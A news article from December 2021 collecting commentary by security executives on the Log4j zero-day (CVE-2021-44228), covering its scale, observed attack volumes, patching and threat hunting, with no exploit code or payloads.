Updated: Dec 12, 2021
A new zero-day vulnerability has been discovered in a widely used Java logging library called “Apache Log4j” that is easy to exploit and enables attackers to gain full control of affected servers. While the vulnerability was first discovered in Minecraft, it is expected to have wide reaching implications due to the vast amount of enterprise applications that use the Log4j tool.
Arshan Dabirsiaghi, Co-founder and Chief Scientist at Contrast Security shared his insight on this troubling new exploit risk. He believes that organizations must take a more proactive approach to securing their Java applications:
“Any Java application that logs data uses Log4j and is the most popular logging framework in the Java ecosystem and is used by millions of applications. This zero-day exploit impacts any application using Log4j and allows attackers to run malicious code and commands on other systems. Make no mistake, this is the largest Java vulnerability we have seen in years. It’s absolutely brutal.
There are three main questions that teams should answer now—where does this impact me, how can I mitigate the impact right now to prevent exploitation, and how can I locate this and similar issues to prevent future exploitation?”
Kunal Anand, CTO, Imperva weighed in:
“In terms of magnitude, this will without any doubt, have a big impact on all organizations running Java workloads. Similar to other common vulnerabilities and exposures (CVEs) in its class (referring to those affecting Struts 2 back in 2017), best practices require security teams to immediately patch their software and upgrade third-party components to meet SLAs. Since rolling out updated security rules more than 13 hours ago, Imperva has observed 1.4M+ attacks targeting CVE-2021-44228. We’ve observed peaks reaching roughly 280K attacks per hour. As with other CVEs in its class, we expect to see this number grow, especially as new variants are created and discovered over the coming days and weeks.
As the lifecycle of CVE-2021-44228 is getting started, we can’t help but be reminded of the myriad of Struts 2 CVEs from 2017. Similarly, organizations of all sizes are going to be forced to identify and patch first and third-party applications and APIs. We also recommend that customers implement RASP as part of a broader defense-in-depth strategy for protecting their applications and APIs.”
Andrii Bezverkhyi, founder and CEO, SOC Prime shared his perspective:
“The problem with Log4j is that every major tech on our planet that has java uses it, and the exploit has been around since March. This is worse than Zerologon, it could get as bad as Wannacry. As defenders, we need to do 3 things: work on mitigation, hunt to understand if we were breached since March, and report the status to our Board of Directors for tactical and strategic support. Mitigation is hard. It will take months of work for every company, but it’s important to start today so we can get there faster. Threat Intelligence and real-time detections must be treated with care, as we will literally swarm our SOC Analysts with alerts or skyrocket our SOAR bills by auto-blocking massive numbers of IP’s and domains, which grow by the hour.
Threat hunting must be a high priority. You should be running continuous detections while patching and protecting the network. That means putting alerts in place and querying the logs to search for evidence of attempts to exploit while you are patching the vulnerability. This will be an ongoing effort for the next few months. Enterprises with large security teams have the resources to do this and are well underway with their mitigation process, but there are thousands of organizations without threat hunters on staff that will remain vulnerable to this potentially devastating exploit. For these organizations, it will be important to tap into the power of the cybersecurity community, which has mobilized quickly and come together in the face of an urgent and widespread threat. The world’s best threat hunters are already publishing research that will help organizations detect and mitigate against the log4J vulnerability, and posting that research to threat detection marketplaces. We are seeing a very powerful demonstration of the impact of the global threat hunting community, and that’s why behavioral threat detection is finally at the point of being an indispensable capability in any cyber defender’s arsenal.”